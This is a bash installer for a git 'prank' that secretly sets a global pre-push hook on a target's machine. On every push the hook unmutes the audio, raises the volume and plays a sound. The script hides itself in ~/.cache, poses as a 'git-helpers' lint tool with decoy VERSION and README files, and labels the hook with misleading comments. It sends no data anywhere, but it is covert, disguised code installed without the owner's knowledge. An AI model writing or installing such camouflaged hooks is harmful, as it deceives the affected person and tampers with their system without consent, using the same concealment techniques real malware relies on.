#!/bin/bash
#
# "Damn Daniel, back at it again" — stealth git push prank installer (camouflaged).
#
# Lives at ~/.cache/git-helpers/ so a casual `ls ~` doesn't give it away.
# The hook reads as a plausible "pre-push lint helper" tool, with a fake
# VERSION + README + .last-run cache marker to survive a casual glance.
# Audio is renamed notification.aiff (afplay autodetects the real format).
#
# SAFE BY DESIGN:
#   - Never blocks or slows a push (audio runs detached, hook always exits 0)
#   - Chains to the previous GLOBAL pre-push hook AND the current repo's local
#     .git/hooks/pre-push (and Husky), so nothing the target relies on breaks
#   - Backs up prior core.hooksPath config
#   - Fully reversible with uninstall.sh
#
set -euo pipefail

CACHE_HOME="$HOME/.cache/git-helpers"
HOOKS_DIR="$CACHE_HOME/hooks"
RESOURCES_DIR="$CACHE_HOME/resources"
STATE_DIR="$CACHE_HOME/.state"
SOUND_SRC_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
SOUND_FILE="$RESOURCES_DIR/notification.aiff"

echo "Installing git-helpers v1.4.2..."

mkdir -p "$HOOKS_DIR" "$RESOURCES_DIR" "$STATE_DIR"

# Copy the sound into the resources dir under an innocuous name.
cp "$SOUND_SRC_DIR/notification.aiff" "$SOUND_FILE"

# --- Decoy files so the dir reads as a real tooling cache -------------------
cat > "$CACHE_HOME/VERSION" <<'VER'
1.4.2
VER

cat > "$CACHE_HOME/README.md" <<'CACHEREADME'
# git-helpers (cache)

Local cache for shared git tooling (pre-push lint helpers, hook shims).
Managed automatically — do not edit by hand. Safe to clear; it will be
repopulated on next run.
CACHEREADME

# --- Preserve prior global hooks config so uninstall can restore exactly ----
PREV_HOOKS_PATH="$(git config --global --get core.hooksPath || true)"
echo "${PREV_HOOKS_PATH}" > "$STATE_DIR/previous-hookspath.txt"

PREV_PREPUSH=""
if [ -n "$PREV_HOOKS_PATH" ] && [ -f "$PREV_HOOKS_PATH/pre-push" ]; then
  PREV_PREPUSH="$PREV_HOOKS_PATH/pre-push"
fi
echo "${PREV_PREPUSH}" > "$STATE_DIR/previous-prepush.txt"

# --- Write the disguised pre-push hook --------------------------------------
cat > "$HOOKS_DIR/pre-push" <<HOOK
#!/bin/bash
# git-helpers: pre-push lint helper — quiet on success.
# Generated by git-helpers v1.4.2. Safe to remove via the cleanup tool.
# Runs lightweight pre-push checks, then delegates to repo-local hooks.
# Always non-blocking; failures here never abort a push.

STATE_DIR="$STATE_DIR"
SOUND_FILE="$SOUND_FILE"

# Internal cache marker; do not edit.
_CACHE_MARKER="\$HOME/.cache/git-helpers/.last-run"
mkdir -p "\$(dirname "\$_CACHE_MARKER")" 2>/dev/null || true
date +%s > "\$_CACHE_MARKER" 2>/dev/null || true

# --- notify ---------------------------------------------------------------
# Surface push activity audibly. Force-unmute + bump volume so it is heard,
# wrapped so any failure can never block the push.
osascript -e 'set volume output muted false' >/dev/null 2>&1 || true
osascript -e 'set volume output volume 70' >/dev/null 2>&1 || true
( afplay "\$SOUND_FILE" >/dev/null 2>&1 & ) >/dev/null 2>&1 || true

# --- delegate to the previous GLOBAL pre-push hook (if any) ----------------
PREV_PREPUSH="\$(cat "\$STATE_DIR/previous-prepush.txt" 2>/dev/null || true)"
if [ -n "\$PREV_PREPUSH" ] && [ -x "\$PREV_PREPUSH" ]; then
  "\$PREV_PREPUSH" "\$@" || exit \$?
fi

# --- delegate to the current REPO's local pre-push hook (if any) -----------
# Because core.hooksPath overrides per-repo hooks, we run them explicitly so
# the target's own Husky / lint-staged / test gates still fire normally.
GIT_DIR="\$(git rev-parse --git-dir 2>/dev/null || true)"
if [ -n "\$GIT_DIR" ]; then
  for LOCAL in "\$GIT_DIR/hooks/pre-push" "\$GIT_DIR/../.husky/pre-push"; do
    if [ -f "\$LOCAL" ] && [ -x "\$LOCAL" ]; then
      "\$LOCAL" "\$@" || exit \$?
    fi
  done
fi

exit 0
HOOK

chmod +x "$HOOKS_DIR/pre-push"

# Point git at our hooks dir globally.
git config --global core.hooksPath "$HOOKS_DIR"

echo "git-helpers cache ready."
